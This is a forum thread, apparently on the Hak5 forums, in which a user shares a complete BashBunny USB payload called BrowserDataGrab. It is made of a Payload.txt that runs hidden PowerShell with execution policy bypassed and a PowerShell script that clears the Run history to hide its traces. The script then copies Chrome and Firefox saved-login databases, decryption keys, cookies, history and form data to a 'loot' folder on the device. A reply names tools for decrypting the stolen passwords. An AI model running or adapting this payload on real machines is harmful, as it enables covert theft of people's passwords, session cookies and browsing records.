Jump to content

[PAYLOAD] BrowserDataGrab


Whiskey
 Share

Recommended Posts

Built a payload that will grab all files required to see a user's browser history as well as unpack any saved passwords.  Based on some work done by previous authors already included in the Hak5 BashBunny github library. 

Run is complete in about 15 seconds.

Payload.txt:

LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION

LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
LED FINISH

1.ps1:

# Remove run history from registry
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

# Get the path and filename for output
# find the connected BashBunny
$VolumeName = "BashBunny"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
get-wmiobject win32_logicaldisk | % {
	if ($_.VolumeName -eq $VolumeName) {
		$backupDrive = $_.DeviceID
	}
}

# See if a loot folder exists on USB, and if not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
	New-Item -ItemType directory -Path $TARGETDIR
}

# See if a loot folder exists on USB, and if not create one
$TARGETDIR = $backupDrive + "\loot\PassGrab-" + $computerSystem.Name
if(!(Test-Path -Path $TARGETDIR )){
	New-Item -ItemType directory -Path $TARGETDIR
}

New-Item -ItemType directory -Path $TARGETDIR\IE
New-Item -ItemType directory -Path $TARGETDIR\IE\Favorites
New-Item -ItemType directory -Path $TARGETDIR\chrome
New-Item -ItemType directory -Path $TARGETDIR\firefox

# xcopy arguments
# /C Continues copying even if errors occur.
# /Q Does not display file names when copying.
# /G Allows the copying of encrypted files to destination that does not suport encryption.
# /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
# /E Copies directories and subdirectories, including empty ones.

# Internet Explorer Browser Data
xcopy /C /Q /G /Y /E $env:userprofile\Favorites\* $TARGETDIR\IE\Favorites\
if (Test-Path $env:userprofile\AppData\Local\Microsoft\Windows\History) {
	xcopy /C /Q /G /Y /E $env:userprofile\AppData\Local\Microsoft\Windows\History\* $TARGETDIR\IE\
}

# Chrome Profile Data
if (Test-Path "$env:userprofile\AppData\Local\Google\Chrome\User Data\Default") {
	xcopy /C /Q /G /Y "$env:userprofile\AppData\Local\Google\Chrome\User Data\Default\Login Data" $TARGETDIR\chrome\Default\
	xcopy /C /Q /G /Y "$env:userprofile\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" $TARGETDIR\chrome\Default\
	xcopy /C /Q /G /Y "$env:userprofile\AppData\Local\Google\Chrome\User Data\Default\Cookies" $TARGETDIR\chrome\Default\
	xcopy /C /Q /G /Y "$env:userprofile\AppData\Local\Google\Chrome\User Data\Default\History" $TARGETDIR\chrome\Default\
	xcopy /C /Q /G /Y "$env:userprofile\AppData\Local\Google\Chrome\User Data\Local State" $TARGETDIR\chrome\
}


# Firefox Profile Data
if (Test-Path $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles) {
	$ProfileDirs =@()
	$ProfileDir = Get-ChildItem $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\ | ForEach-Object{$_.Name}
	For($i = 0; $i -lt $ProfileDir.count; $i++) {
		$ProfileDirs += $ProfileDir
		Foreach ($ProfileDir in $ProfileDirs) {
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\places.sqlite $TARGETDIR\firefox\$ProfileDir\
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\key4.db $TARGETDIR\firefox\$ProfileDir\
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\logins.json $TARGETDIR\firefox\$ProfileDir\
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\cookies.sqlite $TARGETDIR\firefox\$ProfileDir\
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\formhistory.sqlite $TARGETDIR\firefox\$ProfileDir\
			xcopy /C /Q /G /Y $env:userprofile\AppData\Roaming\Mozilla\Firefox\Profiles\$ProfileDir\cert9.db $TARGETDIR\firefox\$ProfileDir\
			}
	}	
}

 

  • Thanks 1
Link to comment
Share on other sites

For what it's worth I use WebBrowserPassView by nirsoft.net to extract the stored passwords and SQLiteBrowser to dump bookmarks, cookies, history, etc databases to comma delimited files.

 

Probably missing some key browser elements I could be grabbing with this, and I'm not really a Powershell expert, so if you have criticism or advice, I'd love to hear it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...